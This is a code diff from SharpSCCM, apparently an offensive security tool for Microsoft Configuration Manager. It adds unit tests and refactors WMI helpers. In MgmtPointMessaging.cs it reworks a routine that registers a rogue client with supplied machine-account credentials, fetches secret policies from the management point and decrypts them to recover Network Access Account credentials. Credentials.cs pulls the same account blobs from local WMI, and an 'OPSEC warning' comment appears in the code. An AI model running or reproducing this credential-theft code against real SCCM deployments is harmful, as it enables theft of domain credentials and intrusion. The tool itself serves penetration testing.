+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Release|x86.ActiveCfg = Release|Win32
+		{8FAC6B27-207E-496F-BAC6-DCD5F5228B83}.Release|x86.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/UnitTests/ClientWmiTests.cs
+++ b/UnitTests/ClientWmiTests.cs
@@ -1,0 +1,30 @@
+﻿using Microsoft.ConfigurationManagement.Messaging.Framework;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+namespace SharpSCCM.UnitTests
+{
+    [TestClass]
+    public class ClientWmiTests
+    {
+        [TestMethod]
+        public void GetCurrentManagementPointAndSiteCode_Success_ReturnsStrings()
+        {
+            (string currentManagementPoint, string siteCode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
+            Assert.IsInstanceOfType(currentManagementPoint, typeof(string));
+            Assert.IsNotNull(currentManagementPoint, "currentManagementPoint != null");
+            Assert.IsInstanceOfType(siteCode, typeof(string));
+            Assert.IsNotNull(siteCode, "siteCode != null");
+            int siteCodeLength = 3;
+            Assert.AreEqual(siteCodeLength, siteCode.Length);
+        }
+
+        [TestMethod]
+        public void GetSmsId_Success_ReturnsSmsClientId()
+        {
+            SmsClientId smsId = ClientWmi.GetSmsId();
+            Assert.IsInstanceOfType(smsId, typeof(SmsClientId));
+            Assert.IsNotNull(smsId, "smsId != null");
+            StringAssert.Contains(smsId.ToString(), "GUID");
+        }
+    }
+}

--- a/UnitTests/MgmtPointWmiTests.cs
+++ b/UnitTests/MgmtPointWmiTests.cs
@@ -1,0 +1,108 @@
+﻿using Microsoft.VisualStudio.TestTools.UnitTesting;
+using System;
+using System.IO;
+using System.Management;
+using System.Net;
+using System.Resources;
+
+namespace SharpSCCM.UnitTests
+{
+    [TestClass]
+    public class MgmtPointWmiTests
+    {
+        public TestContext TestContext { get; set; }
+
+        [TestMethod]
+        public void AddDeviceToCollection_PrintsDeviceNameInCollectionMembers()
+        {
+            string collectionName = "AddDeviceToCollection_UnitTest";
+            string deviceName = Dns.GetHostName();
+            
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection();
+            TestContext.WriteLine($"Device name is {deviceName}");
+            MgmtPointWmi.NewCollection(wmiConnection, "device", collectionName);
+            var stringWriter = new StringWriter();
+            Console.SetOut(stringWriter);
+            MgmtPointWmi.AddDeviceToCollection(wmiConnection, deviceName, collectionName);
+            StringAssert.Contains(stringWriter.ToString(), $"Name: {deviceName.ToUpper()}");
+            TestContext.WriteLine(stringWriter.ToString());
+            Cleanup.RemoveCollection(wmiConnection, collectionName);
+        }
+
+        [TestMethod]
+        public void AddUserToCollection_PrintsUserNameInCollectionMembers()
+        {
+            /*
+            string collectionName = "AddUserToCollection_UnitTest";
+            string domainName = Environment.UserDomainName;
+            string userName = Environment.UserName;
+            string fullUserName = $"{domainName}\\{userName}";
+            
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection();
+            TestContext.WriteLine($"User name is {fullUserName}");
+            MgmtPointWmi.NewCollection(wmiConnection, "user", collectionName);
+            var stringWriter = new StringWriter();
+            Console.SetOut(stringWriter);
+            MgmtPointWmi.AddUserToCollection(wmiConnection, fullUserName, collectionName);
+            StringAssert.Contains(stringWriter.ToString(), $"Name: {fullUserName.ToUpper()}");
+            TestContext.WriteLine(stringWriter.ToString());
+            //Cleanup.RemoveCollection(wmiConnection, CollectionName);
+            */
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void GenerateCCR_DoesStuff()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void GetCollectionMember_PrintsCollectionMembers()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void GetSitePushMethod_Prints_SMS_SCI_SCProperty_Contents()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void GetSitePushMethod_PrintsClientPushAccounts()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void Exec_DoesStuff()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void InvokeUpdate_CallsInitiateClientOperation()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void NewApplication_PrintsNewApplicationNameIn_SMS_Application()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void NewApplication_PrintsNewCollectionNameIn_SMS_Collection()
+        {
+            Assert.Inconclusive();
+        }
+
+        [TestMethod]
+        public void NewDeployment_PrintsNewDeploymentNameIn_SMS_ApplicationAssignment()
+        {
+            Assert.Inconclusive();
+        }
+    }
+}

--- a/UnitTests/MgmtUtilTests.cs
+++ b/UnitTests/MgmtUtilTests.cs
@@ -1,0 +1,63 @@
+﻿using Microsoft.VisualStudio.TestTools.UnitTesting;
+using System;
+using System.IO;
+using System.Management;
+
+namespace SharpSCCM.UnitTests
+{
+    [TestClass]
+    public class MgmtUtilTests
+    {
+        [TestMethod]
+        public void BuildClassInstanceQueryString_Success_ReturnsString()
+        {
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            string query = MgmtUtil.BuildClassInstanceQueryString(wmiConnection, "SMS_Authority");
+            Assert.IsInstanceOfType(query, typeof(string));
+            Assert.IsNotNull(query, "query != null");
+            StringAssert.StartsWith(query, "SELECT");
+        }
+
+        [TestMethod]
+        public void GetClassInstanceCollection_Success_ReturnsManagementObjectCollection()
+        {
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            string query = MgmtUtil.BuildClassInstanceQueryString(wmiConnection, "SMS_Authority");
+            ManagementObjectCollection classInstanceCollection = MgmtUtil.GetClassInstanceCollection(wmiConnection, null, query);
+            Assert.IsInstanceOfType(classInstanceCollection, typeof(ManagementObjectCollection));
+            Assert.IsNotNull(classInstanceCollection, "classInstanceCollection != null");
+        }
+
+        [TestMethod]
+        public void GetClassInstances_DryRun_PrintsQuery()
+        {
+
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            string query = MgmtUtil.BuildClassInstanceQueryString(wmiConnection, "SMS_Authority");
+            var stringWriter = new StringWriter();
+            Console.SetOut(stringWriter);
+            MgmtUtil.GetClassInstances(wmiConnection, "SMS_Authority", false, null, null, null, true);
+            string expectedOutput = $"[+] WQL query: {query}";
+            Assert.AreEqual(expectedOutput.Trim(), stringWriter.ToString().Trim());
+        }
+
+        [TestMethod]
+        public void GetClassInstances_NotDryRun_PrintsClasses()
+        {
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            var stringWriter = new StringWriter();
+            Console.SetOut(stringWriter);
+            MgmtUtil.GetClassInstances(wmiConnection, "SMS_Authority");
+            StringAssert.Contains( stringWriter.ToString(), "CurrentManagementPoint");
+        }
+
+        [TestMethod]
+        public void GetKeyPropertyNames_Success_ReturnsStringArray()
+        {
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            string[] keyProperties = MgmtUtil.GetKeyPropertyNames(wmiConnection, "SMS_Authority");
+            Assert.IsInstanceOfType(keyProperties, typeof(string[]));
+            StringAssert.Contains(keyProperties[0], "Name");
+        }
+    }
+}

--- a/UnitTests/Properties/AssemblyInfo.cs
+++ b/UnitTests/Properties/AssemblyInfo.cs
@@ -1,0 +1,20 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+[assembly: AssemblyTitle("SharpSCCM.UnitTests")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("SharpSCCM.UnitTests")]
+[assembly: AssemblyCopyright("Copyright ©  2022")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+[assembly: ComVisible(false)]
+
+[assembly: Guid("03652836-898e-4a9f-b781-b7d86e750f60")]
+
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

--- a/UnitTests/UnitTests.csproj
+++ b/UnitTests/UnitTests.csproj
@@ -1,0 +1,105 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.props" Condition="Exists('..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.props')" />
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{03652836-898E-4A9F-B781-B7D86E750F60}</ProjectGuid>
+    <OutputType>Library</OutputType>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <RootNamespace>SharpSCCM.UnitTests</RootNamespace>
+    <AssemblyName>SharpSCCM.UnitTests</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <ProjectTypeGuids>{3AC096D0-A1C2-E12C-1390-A8335801FDAB};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
+    <VisualStudioVersion Condition="'$(VisualStudioVersion)' == ''">15.0</VisualStudioVersion>
+    <VSToolsPath Condition="'$(VSToolsPath)' == ''">$(MSBuildExtensionsPath32)\Microsoft\VisualStudio\v$(VisualStudioVersion)</VSToolsPath>
+    <ReferencePath>$(ProgramFiles)\Common Files\microsoft shared\VSTT\$(VisualStudioVersion)\UITestExtensionPackages</ReferencePath>
+    <IsCodedUITest>False</IsCodedUITest>
+    <TestProjectType>UnitTest</TestProjectType>
+    <NuGetPackageImportStamp>
+    </NuGetPackageImportStamp>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
+    <PlatformTarget>x86</PlatformTarget>
+    <OutputPath>bin\x86\Debug\</OutputPath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
+    <PlatformTarget>x86</PlatformTarget>
+    <OutputPath>bin\x86\Release\</OutputPath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
+    <DebugSymbols>true</DebugSymbols>
+    <OutputPath>bin\x64\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <DebugType>full</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
+    <OutputPath>bin\x64\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <DebugType>pdbonly</DebugType>
+    <PlatformTarget>x64</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>prompt</ErrorReport>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Microsoft.ConfigurationManagement.Messaging, Version=5.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35">
+      <Private>False</Private>
+    </Reference>
+    <Reference Include="Microsoft.VisualStudio.TestPlatform.TestFramework, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\MSTest.TestFramework.2.1.2\lib\net45\Microsoft.VisualStudio.TestPlatform.TestFramework.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\MSTest.TestFramework.2.1.2\lib\net45\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Management" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="ClientWmiTests.cs" />
+    <Compile Include="MgmtUtilTests.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="packages.config" />
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\SharpSCCM.csproj">
+      <Project>{e4d9ef39-0fce-4573-978b-abf8df6aec23}</Project>
+      <Name>SharpSCCM</Name>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VSToolsPath)\TeamTest\Microsoft.TestTools.targets" Condition="Exists('$(VSToolsPath)\TeamTest\Microsoft.TestTools.targets')" />
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.props'))" />
+    <Error Condition="!Exists('..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.targets'))" />
+  </Target>
+  <Import Project="..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.targets" Condition="Exists('..\packages\MSTest.TestAdapter.2.1.2\build\net45\MSTest.TestAdapter.targets')" />
+</Project>

--- a/UnitTests/UnitTests.csproj
+++ b/UnitTests/UnitTests.csproj
@@ -65,8 +65,8 @@
     <ErrorReport>prompt</ErrorReport>
   </PropertyGroup>
   <ItemGroup>
-    <Reference Include="Microsoft.ConfigurationManagement.Messaging, Version=5.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35">
-      <Private>False</Private>
+    <Reference Include="Microsoft.ConfigurationManagement.Messaging">
+      <HintPath>..\Microsoft.ConfigurationManagement.Messaging.dll</HintPath>
     </Reference>
     <Reference Include="Microsoft.VisualStudio.TestPlatform.TestFramework, Version=14.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
       <HintPath>..\packages\MSTest.TestFramework.2.1.2\lib\net45\Microsoft.VisualStudio.TestPlatform.TestFramework.dll</HintPath>
@@ -82,6 +82,7 @@
     <Compile Include="ClientWmiTests.cs" />
     <Compile Include="MgmtUtilTests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="MgmtPointWmiTests.cs" />
   </ItemGroup>
   <ItemGroup>
     <None Include="packages.config" />

--- a/UnitTests/packages.config
+++ b/UnitTests/packages.config
@@ -1,0 +1,5 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="MSTest.TestAdapter" version="2.1.2" targetFramework="net472" />
+  <package id="MSTest.TestFramework" version="2.1.2" targetFramework="net472" />
+</packages>

--- a/lib/Cleanup.cs
+++ b/lib/Cleanup.cs
@@ -40,13 +40,13 @@ namespace SharpSCCM
                     collectionObj.Delete();
                 }
                 Console.WriteLine($"[+] Deleted all collections named {collection}");
-                Console.WriteLine($"[+] Querying for applications named {collection}");
+                Console.WriteLine($"[+] Querying for collections named {collection}");
                 string whereCondition = "Name='" + collection + "'";
                 MgmtUtil.GetClassInstances(scope, "SMS_Collection", false, null, whereCondition);
             }
             else
             {
-                Console.WriteLine($"[+] Found {collections.Count} applications named {collections}");
+                Console.WriteLine($"[+] Found {collections.Count} collections named {collections}");
             }
         }
 

--- a/lib/ClientFileSystem.cs
+++ b/lib/ClientFileSystem.cs
@@ -19,7 +19,7 @@ namespace SharpSCCM
 
         public static void LocalPushLogs(string startTime, string startDate)
         {
-            ManagementScope sccmConnection = MgmtUtil.NewSccmConnection("\\\\localhost\\root\\cimv2");
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost", "root\\cimv2");
             DateTime startDateObj = DateTime.Parse(startDate);
             // To-do
         }

--- a/lib/ClientWmi.cs
+++ b/lib/ClientWmi.cs
@@ -4,7 +4,7 @@ using Microsoft.ConfigurationManagement.Messaging.Framework;
 
 namespace SharpSCCM
 {
-    static class ClientWmi
+    public class ClientWmi
     {
         public static (string, string) GetCurrentManagementPointAndSiteCode()
         {
@@ -28,6 +28,8 @@ namespace SharpSCCM
                     }
                 }
             }
+            Console.WriteLine($"[+] Current management point: {currentManagementPoint}");
+            Console.WriteLine($"[+] Site code: {siteCode}");
             return (currentManagementPoint, siteCode);
         }
 
@@ -35,13 +37,13 @@ namespace SharpSCCM
         {
             ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
             ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_Client"));
-            string SmsId = null;
+            string smsId = null;
             foreach (ManagementObject instance in searcher.Get())
             {
-                SmsId = instance["ClientId"].ToString();
+                smsId = instance["ClientId"].ToString();
             }
-            Console.WriteLine($"[+] Obtained SmsId from local host: {SmsId}");
-            return new SmsClientId(SmsId);
+            Console.WriteLine($"[+] Obtained SmsId from local host: {smsId}");
+            return new SmsClientId(smsId);
         }
     }
 }

--- a/lib/ClientWmi.cs
+++ b/lib/ClientWmi.cs
@@ -6,10 +6,35 @@ namespace SharpSCCM
 {
     static class ClientWmi
     {
+        public static (string, string) GetCurrentManagementPointAndSiteCode()
+        {
+            string currentManagementPoint = "";
+            string siteCode = "";
+
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            string query = MgmtUtil.BuildClassInstanceQueryString(wmiConnection, "SMS_Authority", false, new[] { "CurrentManagementPoint", "Name" });
+            ManagementObjectCollection classInstances = MgmtUtil.GetClassInstanceCollection(wmiConnection, "SMS_Authority", query);
+            foreach (ManagementObject queryObj in classInstances)
+            {
+                foreach (PropertyData prop in queryObj.Properties)
+                {
+                    if (prop.Name == "CurrentManagementPoint")
+                    {
+                        currentManagementPoint = prop.Value.ToString();
+                    }
+                    else if (prop.Name == "Name")
+                    {
+                        siteCode = prop.Value.ToString().Substring(4, 3);
+                    }
+                }
+            }
+            return (currentManagementPoint, siteCode);
+        }
+
         public static SmsClientId GetSmsId()
         {
-            ManagementScope sccmConnection = MgmtUtil.NewSccmConnection("\\\\localhost\\root\\ccm");
-            ManagementObjectSearcher searcher = new ManagementObjectSearcher(sccmConnection, new ObjectQuery("SELECT * FROM CCM_Client"));
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_Client"));
             string SmsId = null;
             foreach (ManagementObject instance in searcher.Get())
             {

--- a/lib/Credentials.cs
+++ b/lib/Credentials.cs
@@ -30,8 +30,8 @@ namespace SharpSCCM
             }
 
             // Parse from CIM repo
-            string protectedUsername = "";
-            string protectedPassword = "";
+            //string protectedUsername = "";
+            //string protectedPassword = "";
 
             // TODO -- Logic to strip blob
             // But we do have to be elevated to retrieve the system masterkeys...
@@ -111,9 +111,9 @@ namespace SharpSCCM
             if (Helpers.IsHighIntegrity())
             {
                 Console.WriteLine($"[*] Retrieving Network Access Account blobs via WMI\n");
-                ManagementScope sccmConnection = MgmtUtil.NewSccmConnection("\\\\localhost\\root\\ccm\\policy\\Machine\\ActualConfig");
-                //MgmtUtil.GetClassInstances(sccmConnection, "CCM_NetworkAccessAccount");
-                ManagementObjectSearcher searcher = new ManagementObjectSearcher(sccmConnection, new ObjectQuery("SELECT * FROM CCM_NetworkAccessAccount"));
+                ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost","root\\ccm\\policy\\Machine\\ActualConfig");
+                //MgmtUtil.GetClassInstances(wmiConnection, "CCM_NetworkAccessAccount");
+                ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_NetworkAccessAccount"));
                 ManagementObjectCollection accounts = searcher.Get();
                 if (accounts.Count > 0)
                 {

--- a/lib/Crypto.cs
+++ b/lib/Crypto.cs
@@ -1,4 +1,5 @@
-﻿using System;
+﻿using Microsoft.ConfigurationManagement.Messaging.Framework;
+using System;
 using System.Security.Cryptography;
 
 namespace SharpSCCM

--- a/lib/MgmtPointMessaging.cs
+++ b/lib/MgmtPointMessaging.cs
@@ -1,26 +1,17 @@
-﻿#define TRACE
-using System;
-using System.Collections.Generic;
-using System.Diagnostics;
+﻿using System;
 using System.IO;
-using System.Linq;
 using System.Net;
 using System.Net.Http;
-using System.Reflection;
 using System.Security.Cryptography;
 using System.Security.Cryptography.Pkcs;
 using System.Security.Cryptography.X509Certificates;
 using System.Text;
-using System.Threading.Tasks;
 using System.Xml;
 
 // Configuration Manager SDK
 using Microsoft.ConfigurationManagement.Messaging.Framework;
 using Microsoft.ConfigurationManagement.Messaging.Messages;
 using Microsoft.ConfigurationManagement.Messaging.Sender.Http;
-using Security.Cryptography;
-using OidGroup = System.Security.Cryptography.OidGroup;
-using TripleDESCng = Security.Cryptography.TripleDESCng;
 
 namespace SharpSCCM
 {
@@ -34,27 +25,41 @@ namespace SharpSCCM
             return certificate;
         }
 
-        public static MessageCertificateX509Volatile CreateUserCertificate(bool store = false)
+        public static MessageCertificateX509Volatile CreateUserCertificate(string subjectName = null, bool store = false)
         {
             // Generate certificate for signing and encrypting messages
             RSA rsaKey = RSA.Create(2048);
-            CertificateRequest certRequest = new CertificateRequest("CN=ConfigMgr Client", rsaKey, HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);
+            if (string.IsNullOrEmpty(subjectName))
+            {
+               subjectName = "ConfigMgr Client Messaging";
+            }
+            CertificateRequest certRequest = new CertificateRequest($"CN={subjectName}", rsaKey, HashAlgorithmName.SHA256, RSASignaturePadding.Pkcs1);
             certRequest.CertificateExtensions.Add(new X509KeyUsageExtension(X509KeyUsageFlags.DigitalSignature | X509KeyUsageFlags.DataEncipherment, false));
             // Any extended key usage
             certRequest.CertificateExtensions.Add(new X509EnhancedKeyUsageExtension(new OidCollection { new Oid("1.3.6.1.4.1.311.101.2"), new Oid("1.3.6.1.4.1.311.101") }, true));
             X509Certificate2 certificate2 = certRequest.CreateSelfSigned(DateTimeOffset.Now, DateTimeOffset.Now.AddYears(1));
-            certificate2.FriendlyName = "ConfigMgr Client Certificate";
+            certificate2.FriendlyName = $"{subjectName}";
             X509Certificate2 exportedCert = new X509Certificate2(certificate2.Export(X509ContentType.Pfx, string.Empty));
+            Console.WriteLine($"[+] Created \"{subjectName}\" in memory for device registration and signing/encrypting subsequent messages");
             if (store)
             {
                 var x509Store = new X509Store("My", StoreLocation.CurrentUser);
                 x509Store.Open(OpenFlags.MaxAllowed);
                 x509Store.Add(exportedCert);
+                Console.WriteLine($"[+] Wrote \"{subjectName}\" certificate to {x509Store.Name} store for {x509Store.Location}");
             }
             MessageCertificateX509Volatile certificate = new MessageCertificateX509Volatile(exportedCert);
             return certificate;
         }
 
+        public static void DeleteUserCertificate(MessageCertificateX509 certificate)
+        {
+            var x509Store = new X509Store("My", StoreLocation.CurrentUser);
+            x509Store.Open(OpenFlags.MaxAllowed);
+            x509Store.Remove(certificate.X509Certificate);
+            Console.WriteLine($"[+] Deleted \"{certificate.X509Certificate.SubjectName}\" certificate from {x509Store.Name} store for {x509Store.Location}");
+        }
+        
         public static MessageCertificateX509 GetEncryptionCertificate()
         {
             // Get encryption certificate used by the legitimate client
@@ -62,66 +67,60 @@ namespace SharpSCCM
             return certificate;
         }
 
-        public static async void GetNetworkAccessAccounts(string server, string sitecode, string method, string computer = null, string password = null)
+        public static async void GetNetworkAccessAccounts(string managementPoint, string siteCode, string username = null, string password = null, string outputPath = null)
         {
-            // HTTP sender is used for sending messages to the MP
-            HttpSender sender = new HttpSender();
-
-            // Register a new client
-            // Use NTLM authentication for the specified machine account to automatically approve the new device record, allowing secret policy retrieval
-            MessageCertificateX509 certificate = CreateUserCertificate(true);
-            // Using a certificate store because Microsoft.ConfigurationManagement.Messaging.Framework.Interop.Internal.DecryptMessage does not support the use of volatile certificates
-            //MessageCertificateX509 certificate = MessageCertificateX509.CreateAndStoreSelfSignedCertificate("ConfigMgr Client Signing and Encryption", "ConfigMgr Client Signing and Encryption", "My", StoreLocation.CurrentUser, new [] {"1.3.6.1.4.1.311.101.2", "1.3.6.1.4.1.311.101"}, DateTime.Now, DateTime.Now.AddMonths(6));
-
-            string authenticationType = "Windows";
-            SmsClientId clientId = RegisterClient(certificate, null, server, sitecode, authenticationType, computer, password);
+            // Thanks to Adam Chester(@_xpn_) for figuring this out! https://blog.xpnsec.com/unobfuscating-network-access-accounts/
+            // Register a new client using NTLM authentication for the specified machine account to automatically approve the new device record, allowing secret policy retrieval
+            // OPSEC warning: I'm not sure why, but this method does not work without temporarily storing the certificate on disk
+            MessageCertificateX509 certificate = CreateUserCertificate(null, true);
+            SmsClientId clientId = RegisterClient(certificate, null, managementPoint, siteCode, "Windows", username, password);
 
             // Send request for policy assignments to obtain policy locations
-            ConfigMgrPolicyAssignmentRequest assignmentRequest = new ConfigMgrPolicyAssignmentRequest();
-
-            // Add our certificate for message signing and encryption
-            assignmentRequest.AddCertificateToMessage(certificate, CertificatePurposes.Signing | CertificatePurposes.Encryption);
-
-            // Configure message settings
-            assignmentRequest.SmsId = clientId;
-            assignmentRequest.Settings.HostName = server;
-            assignmentRequest.Settings.Compression = MessageCompression.Zlib;
-            assignmentRequest.Settings.ReplyCompression = MessageCompression.Zlib;
-            assignmentRequest.SiteCode = sitecode;
-            assignmentRequest.SerializeMessageBody();
-            Console.WriteLine($"[+] Obtaining {assignmentRequest.RequestType} {assignmentRequest.ResourceType} policy assignment from {assignmentRequest.Settings.HostName} {assignmentRequest.SiteCode}");
-            Console.WriteLine($"\n[+] Policy assignment request body:\n{System.Xml.Linq.XElement.Parse("<root>" + assignmentRequest.Body + "</root>")}");
-            ConfigMgrPolicyAssignmentReply assignmentReply = assignmentRequest.SendMessage(sender);
-            Console.WriteLine($"[+] Found {assignmentReply.ReplyAssignments.PolicyAssignments.Count} policy assignments");
+            ConfigMgrPolicyAssignmentReply assignmentReply = SendPolicyAssignmentRequest(clientId, certificate, managementPoint, siteCode);
 
             // Get secret policies
+            string output = null;
             foreach (PolicyAssignment policyAssignment in assignmentReply.ReplyAssignments.PolicyAssignments)
             {
                 if (policyAssignment.Policy.Flags.ToString().Contains("Secret"))
                 {
                     Console.WriteLine("[+] Found policy containing secrets:");
-                    Console.WriteLine($"    ID: {policyAssignment.Policy.Id}");
-                    Console.WriteLine($"    Flags: {policyAssignment.Policy.Flags}");
-                    Console.WriteLine($"    URL: {policyAssignment.Policy.Location.Value}");
+                    Console.WriteLine($"      ID: {policyAssignment.Policy.Id}");
+                    Console.WriteLine($"      Flags: {policyAssignment.Policy.Flags}");
+                    Console.WriteLine($"      URL: {policyAssignment.Policy.Location.Value}");
 
                     // Can't figure out how to authenticate with the SDK so using raw HTTP requests
-                    string policyURL = policyAssignment.Policy.Location.Value.Replace("<mp>", server);
+                    string policyURL = policyAssignment.Policy.Location.Value.Replace("<mp>", managementPoint);
                     HttpResponseMessage policyDownloadResponse = SendPolicyDownloadRequest(policyURL, clientId.ToString(), certificate);
                     byte[] policyDownloadResponseBytes = await policyDownloadResponse.Content.ReadAsByteArrayAsync();
                     Console.WriteLine($"[+] Received encoded response from server for policy {policyAssignment.Policy.Id}");
-                    File.WriteAllBytes("C:\\Users\\cave.johnson.APERTURE\\Desktop\\asn1.bin", policyDownloadResponseBytes);
+
+
 
                     // Parse response ASN1 and decrypt contents
                     ContentInfo contentInfo = new ContentInfo(policyDownloadResponseBytes);
                     EnvelopedCms pkcs7EnvelopedCms = new EnvelopedCms(contentInfo);
                     pkcs7EnvelopedCms.Decode(policyDownloadResponseBytes);
-                    RecipientInfoCollection recipientInfos = pkcs7EnvelopedCms.RecipientInfos;
-                    pkcs7EnvelopedCms.Decrypt(recipientInfos[0]);
-                    Console.WriteLine(Encoding.ASCII.GetString(pkcs7EnvelopedCms.ContentInfo.Content));
-                    Console.WriteLine("---");
+                    RecipientInfo encryptedKey = pkcs7EnvelopedCms.RecipientInfos[0];
+                    pkcs7EnvelopedCms.Decrypt(encryptedKey);
+                    Console.WriteLine($"[+] Successfully decoded and decrypted secret policy {policyAssignment.Policy.Id}");
+                    // Delete the certificate from the current user store
